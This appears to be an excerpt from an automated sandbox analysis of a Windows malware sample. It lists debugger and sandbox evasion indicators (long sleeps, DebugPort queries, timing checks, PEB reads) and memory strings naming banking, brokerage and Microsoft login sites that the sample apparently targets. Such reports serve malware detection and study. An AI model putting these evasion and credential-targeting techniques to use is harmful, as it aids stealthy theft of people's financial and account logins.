Source: C:\Windows\SysWOW64\unlodctr.exe TID: 6668 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe TID: 6668 Thread sleep time: -104000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe TID: 6628 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\unlodctr.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\unlodctr.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0036B7C0 FindFirstFileW,FindNextFileW,FindClose, 8_2_0036B7C0
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 17-EIW25.8.dr Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: outlook.office.comVMware20,11696508427s
Source: 17-EIW25.8.dr Binary or memory string: discord.comVMware20,11696508427f
Source: 17-EIW25.8.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: 17-EIW25.8.dr Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: 17-EIW25.8.dr Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: 17-EIW25.8.dr Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: 17-EIW25.8.dr Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln'I
Source: 17-EIW25.8.dr Binary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
Source: 17-EIW25.8.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: 17-EIW25.8.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: 17-EIW25.8.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514536705.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.3139663955.000001B969F8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 17-EIW25.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: 17-EIW25.8.dr Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: 17-EIW25.8.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: 17-EIW25.8.dr Binary or memory string: tasks.office.comVMware20,11696508427o
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: 17-EIW25.8.dr Binary or memory string: global block list test formVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: dev.azure.comVMware20,11696508427j
Source: 17-EIW25.8.dr Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: 17-EIW25.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: 17-EIW25.8.dr Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: 17-EIW25.8.dr Binary or memory string: AMC password management pageVMware20,11696508427
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A1096E rdtsc 4_2_01A1096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_004172A3 LdrLoadDll, 4_2_004172A3
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CA197 mov eax, dword ptr fs:[00000030h] 4_2_019CA197
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CA197 mov eax, dword ptr fs:[00000030h] 4_2_019CA197
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CA197 mov eax, dword ptr fs:[00000030h] 4_2_019CA197
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8C188 mov eax, dword ptr fs:[00000030h] 4_2_01A8C188
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8C188 mov eax, dword ptr fs:[00000030h] 4_2_01A8C188
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A10185 mov eax, dword ptr fs:[00000030h] 4_2_01A10185
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A74180 mov eax, dword ptr fs:[00000030h] 4_2_01A74180
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A74180 mov eax, dword ptr fs:[00000030h] 4_2_01A74180
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5019F mov eax, dword ptr fs:[00000030h] 4_2_01A5019F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5019F mov eax, dword ptr fs:[00000030h] 4_2_01A5019F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5019F mov eax, dword ptr fs:[00000030h] 4_2_01A5019F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5019F mov eax, dword ptr fs:[00000030h] 4_2_01A5019F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA61E5 mov eax, dword ptr fs:[00000030h] 4_2_01AA61E5
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A001F8 mov eax, dword ptr fs:[00000030h] 4_2_01A001F8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A961C3 mov eax, dword ptr fs:[00000030h] 4_2_01A961C3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A961C3 mov eax, dword ptr fs:[00000030h] 4_2_01A961C3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E1D0 mov eax, dword ptr fs:[00000030h] 4_2_01A4E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E1D0 mov eax, dword ptr fs:[00000030h] 4_2_01A4E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E1D0 mov ecx, dword ptr fs:[00000030h] 4_2_01A4E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E1D0 mov eax, dword ptr fs:[00000030h] 4_2_01A4E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4E1D0 mov eax, dword ptr fs:[00000030h] 4_2_01A4E1D0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A00124 mov eax, dword ptr fs:[00000030h] 4_2_01A00124
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov eax, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov ecx, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov eax, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov eax, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov ecx, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov eax, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov eax, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov ecx, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov eax, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E10E mov ecx, dword ptr fs:[00000030h] 4_2_01A7E10E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A90115 mov eax, dword ptr fs:[00000030h] 4_2_01A90115
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7A118 mov ecx, dword ptr fs:[00000030h] 4_2_01A7A118
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7A118 mov eax, dword ptr fs:[00000030h] 4_2_01A7A118
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7A118 mov eax, dword ptr fs:[00000030h] 4_2_01A7A118
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7A118 mov eax, dword ptr fs:[00000030h] 4_2_01A7A118
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6154 mov eax, dword ptr fs:[00000030h] 4_2_019D6154
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6154 mov eax, dword ptr fs:[00000030h] 4_2_019D6154
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CC156 mov eax, dword ptr fs:[00000030h] 4_2_019CC156
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A64144 mov eax, dword ptr fs:[00000030h] 4_2_01A64144
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A64144 mov eax, dword ptr fs:[00000030h] 4_2_01A64144
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A64144 mov ecx, dword ptr fs:[00000030h] 4_2_01A64144
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A64144 mov eax, dword ptr fs:[00000030h] 4_2_01A64144
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A64144 mov eax, dword ptr fs:[00000030h] 4_2_01A64144
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A68158 mov eax, dword ptr fs:[00000030h] 4_2_01A68158
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A680A8 mov eax, dword ptr fs:[00000030h] 4_2_01A680A8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A960B8 mov eax, dword ptr fs:[00000030h] 4_2_01A960B8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A960B8 mov ecx, dword ptr fs:[00000030h] 4_2_01A960B8
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D208A mov eax, dword ptr fs:[00000030h] 4_2_019D208A
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A560E0 mov eax, dword ptr fs:[00000030h] 4_2_01A560E0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A120F0 mov ecx, dword ptr fs:[00000030h] 4_2_01A120F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CC0F0 mov eax, dword ptr fs:[00000030h] 4_2_019CC0F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D80E9 mov eax, dword ptr fs:[00000030h] 4_2_019D80E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A520DE mov eax, dword ptr fs:[00000030h] 4_2_01A520DE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CA0E3 mov ecx, dword ptr fs:[00000030h] 4_2_019CA0E3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE016 mov eax, dword ptr fs:[00000030h] 4_2_019EE016
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE016 mov eax, dword ptr fs:[00000030h] 4_2_019EE016
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE016 mov eax, dword ptr fs:[00000030h] 4_2_019EE016
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE016 mov eax, dword ptr fs:[00000030h] 4_2_019EE016
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66030 mov eax, dword ptr fs:[00000030h] 4_2_01A66030
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A54000 mov ecx, dword ptr fs:[00000030h] 4_2_01A54000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A72000 mov eax, dword ptr fs:[00000030h] 4_2_01A72000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A72000 mov eax, dword ptr fs:[00000030h] 4_2_01A72000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A72000 mov eax, dword ptr fs:[00000030h] 4_2_01A72000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A72000 mov eax, dword ptr fs:[00000030h] 4_2_01A72000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A72000 mov eax, dword ptr fs:[00000030h] 4_2_01A72000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A72000 mov eax, dword ptr fs:[00000030h] 4_2_01A72000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A72000 mov eax, dword ptr fs:[00000030h] 4_2_01A72000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A72000 mov eax, dword ptr fs:[00000030h] 4_2_01A72000
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CA020 mov eax, dword ptr fs:[00000030h] 4_2_019CA020
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CC020 mov eax, dword ptr fs:[00000030h] 4_2_019CC020
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D2050 mov eax, dword ptr fs:[00000030h] 4_2_019D2050
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FC073 mov eax, dword ptr fs:[00000030h] 4_2_019FC073
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A56050 mov eax, dword ptr fs:[00000030h] 4_2_01A56050
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C8397 mov eax, dword ptr fs:[00000030h] 4_2_019C8397
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C8397 mov eax, dword ptr fs:[00000030h] 4_2_019C8397
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C8397 mov eax, dword ptr fs:[00000030h] 4_2_019C8397
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F438F mov eax, dword ptr fs:[00000030h] 4_2_019F438F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F438F mov eax, dword ptr fs:[00000030h] 4_2_019F438F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CE388 mov eax, dword ptr fs:[00000030h] 4_2_019CE388
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CE388 mov eax, dword ptr fs:[00000030h] 4_2_019CE388
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CE388 mov eax, dword ptr fs:[00000030h] 4_2_019CE388
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA3C0 mov eax, dword ptr fs:[00000030h] 4_2_019DA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA3C0 mov eax, dword ptr fs:[00000030h] 4_2_019DA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA3C0 mov eax, dword ptr fs:[00000030h] 4_2_019DA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA3C0 mov eax, dword ptr fs:[00000030h] 4_2_019DA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA3C0 mov eax, dword ptr fs:[00000030h] 4_2_019DA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA3C0 mov eax, dword ptr fs:[00000030h] 4_2_019DA3C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D83C0 mov eax, dword ptr fs:[00000030h] 4_2_019D83C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D83C0 mov eax, dword ptr fs:[00000030h] 4_2_019D83C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D83C0 mov eax, dword ptr fs:[00000030h] 4_2_019D83C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D83C0 mov eax, dword ptr fs:[00000030h] 4_2_019D83C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A063FF mov eax, dword ptr fs:[00000030h] 4_2_01A063FF
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8C3CD mov eax, dword ptr fs:[00000030h] 4_2_01A8C3CD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A563C0 mov eax, dword ptr fs:[00000030h] 4_2_01A563C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE3F0 mov eax, dword ptr fs:[00000030h] 4_2_019EE3F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE3F0 mov eax, dword ptr fs:[00000030h] 4_2_019EE3F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019EE3F0 mov eax, dword ptr fs:[00000030h] 4_2_019EE3F0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A743D4 mov eax, dword ptr fs:[00000030h] 4_2_01A743D4
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A743D4 mov eax, dword ptr fs:[00000030h] 4_2_01A743D4
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E03E9 mov eax, dword ptr fs:[00000030h] 4_2_019E03E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E03E9 mov eax, dword ptr fs:[00000030h] 4_2_019E03E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E03E9 mov eax, dword ptr fs:[00000030h] 4_2_019E03E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E03E9 mov eax, dword ptr fs:[00000030h] 4_2_019E03E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E03E9 mov eax, dword ptr fs:[00000030h] 4_2_019E03E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E03E9 mov eax, dword ptr fs:[00000030h] 4_2_019E03E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E03E9 mov eax, dword ptr fs:[00000030h] 4_2_019E03E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E03E9 mov eax, dword ptr fs:[00000030h] 4_2_019E03E9
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E3DB mov eax, dword ptr fs:[00000030h] 4_2_01A7E3DB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E3DB mov eax, dword ptr fs:[00000030h] 4_2_01A7E3DB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E3DB mov ecx, dword ptr fs:[00000030h] 4_2_01A7E3DB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7E3DB mov eax, dword ptr fs:[00000030h] 4_2_01A7E3DB
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CC310 mov ecx, dword ptr fs:[00000030h] 4_2_019CC310
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F0310 mov ecx, dword ptr fs:[00000030h] 4_2_019F0310
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A30B mov eax, dword ptr fs:[00000030h] 4_2_01A0A30B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A30B mov eax, dword ptr fs:[00000030h] 4_2_01A0A30B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0A30B mov eax, dword ptr fs:[00000030h] 4_2_01A0A30B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7437C mov eax, dword ptr fs:[00000030h] 4_2_01A7437C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A52349 mov eax, dword ptr fs:[00000030h] 4_2_01A52349
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A78350 mov ecx, dword ptr fs:[00000030h] 4_2_01A78350
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5035C mov eax, dword ptr fs:[00000030h] 4_2_01A5035C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5035C mov eax, dword ptr fs:[00000030h] 4_2_01A5035C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5035C mov eax, dword ptr fs:[00000030h] 4_2_01A5035C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5035C mov ecx, dword ptr fs:[00000030h] 4_2_01A5035C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5035C mov eax, dword ptr fs:[00000030h] 4_2_01A5035C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5035C mov eax, dword ptr fs:[00000030h] 4_2_01A5035C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9A352 mov eax, dword ptr fs:[00000030h] 4_2_01A9A352
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A662A0 mov eax, dword ptr fs:[00000030h] 4_2_01A662A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A662A0 mov ecx, dword ptr fs:[00000030h] 4_2_01A662A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A662A0 mov eax, dword ptr fs:[00000030h] 4_2_01A662A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A662A0 mov eax, dword ptr fs:[00000030h] 4_2_01A662A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A662A0 mov eax, dword ptr fs:[00000030h] 4_2_01A662A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A662A0 mov eax, dword ptr fs:[00000030h] 4_2_01A662A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E284 mov eax, dword ptr fs:[00000030h] 4_2_01A0E284
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E284 mov eax, dword ptr fs:[00000030h] 4_2_01A0E284
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A50283 mov eax, dword ptr fs:[00000030h] 4_2_01A50283
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A50283 mov eax, dword ptr fs:[00000030h] 4_2_01A50283
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A50283 mov eax, dword ptr fs:[00000030h] 4_2_01A50283
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E02A0 mov eax, dword ptr fs:[00000030h] 4_2_019E02A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E02A0 mov eax, dword ptr fs:[00000030h] 4_2_019E02A0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA2C3 mov eax, dword ptr fs:[00000030h] 4_2_019DA2C3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA2C3 mov eax, dword ptr fs:[00000030h] 4_2_019DA2C3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA2C3 mov eax, dword ptr fs:[00000030h] 4_2_019DA2C3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA2C3 mov eax, dword ptr fs:[00000030h] 4_2_019DA2C3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DA2C3 mov eax, dword ptr fs:[00000030h] 4_2_019DA2C3
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E02E1 mov eax, dword ptr fs:[00000030h] 4_2_019E02E1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E02E1 mov eax, dword ptr fs:[00000030h] 4_2_019E02E1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E02E1 mov eax, dword ptr fs:[00000030h] 4_2_019E02E1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C823B mov eax, dword ptr fs:[00000030h] 4_2_019C823B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6259 mov eax, dword ptr fs:[00000030h] 4_2_019D6259
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CA250 mov eax, dword ptr fs:[00000030h] 4_2_019CA250
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A80274 mov eax, dword ptr fs:[00000030h] 4_2_01A80274
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A58243 mov eax, dword ptr fs:[00000030h] 4_2_01A58243
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A58243 mov ecx, dword ptr fs:[00000030h] 4_2_01A58243
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019C826B mov eax, dword ptr fs:[00000030h] 4_2_019C826B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8A250 mov eax, dword ptr fs:[00000030h] 4_2_01A8A250
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A8A250 mov eax, dword ptr fs:[00000030h] 4_2_01A8A250
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4260 mov eax, dword ptr fs:[00000030h] 4_2_019D4260
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4260 mov eax, dword ptr fs:[00000030h] 4_2_019D4260
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D4260 mov eax, dword ptr fs:[00000030h] 4_2_019D4260
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A505A7 mov eax, dword ptr fs:[00000030h] 4_2_01A505A7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A505A7 mov eax, dword ptr fs:[00000030h] 4_2_01A505A7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A505A7 mov eax, dword ptr fs:[00000030h] 4_2_01A505A7
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D2582 mov eax, dword ptr fs:[00000030h] 4_2_019D2582
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D2582 mov ecx, dword ptr fs:[00000030h] 4_2_019D2582
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A04588 mov eax, dword ptr fs:[00000030h] 4_2_01A04588
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F45B1 mov eax, dword ptr fs:[00000030h] 4_2_019F45B1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F45B1 mov eax, dword ptr fs:[00000030h] 4_2_019F45B1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0E59C mov eax, dword ptr fs:[00000030h] 4_2_01A0E59C
